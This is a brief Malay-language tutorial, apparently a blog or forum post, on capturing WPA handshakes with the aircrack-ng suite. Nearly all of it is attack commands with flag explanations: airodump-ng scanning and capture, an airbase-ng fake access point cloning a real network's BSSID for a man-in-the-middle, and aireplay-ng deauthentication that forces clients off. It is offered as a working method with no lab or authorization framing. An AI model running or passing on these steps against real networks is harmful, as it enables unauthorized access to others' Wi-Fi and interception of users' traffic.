Saya akan tunjukkan
cara anyg lebih cepat dan guarantee dapat capture WPA handsake..
Pernah berlaku berdasarkan pengalaman lebih dari 2 kali di mana tidak dapat
caputre wpa-handsake dengan cara deauth biasa,, mugkin disebab kan line yang tidak kuat, atau client yang passive..
so di bawah ni adalah cara-caranya
===================================================================
airodump-ng -f 100 --showack -h --berlin 10 -a mon0
--berlin 10 = masa 10 saat untuk display AP jika AP offline/no detect
--showack = show ack/cts/rts statistics
-h = Hides known stations for --showack
-a = filter client yang xconnect mane2 router
mon0 = wifi device
===================================================================
airodump-ng -c 1 --bssid 84:C9:B2:BE:99:7E -w capture -a mon0
-w = write capture file
--bssid = mac adress AP
-c = channel AP
-a = filter client yang xconnect mane2 router
mon0 = wifi device
===================================================================
airbase-ng --bssid 84:C9:B2:BE:99:7E -a 84:C9:B2:BE:99:7E -h 00:06:25:02:FF:D8 -c 1 -e theatre -Z 4 -W 1 -v mon0
*** Membina fake AP di mana client akan connect fake AP dahulu ***
senang untuk capture WPA-handshake
--bssid = AP bssid
-a = buat fake AP punya bssid
-h = Mac kite untuk Man in the middle attack
-c = channel AP
-e = nama AP
-Z = for WPA
-W = dont set wep flag beacon
-v = verbose (print more massege)
===================================================================
aireplay-ng --deauth 6 -a 84:C9:B2:BE:99:7E -c 00:30:0A:F9:AE:07 mon0
Paksa client disconnect dengan aireplay
Contoh Screenshoot
-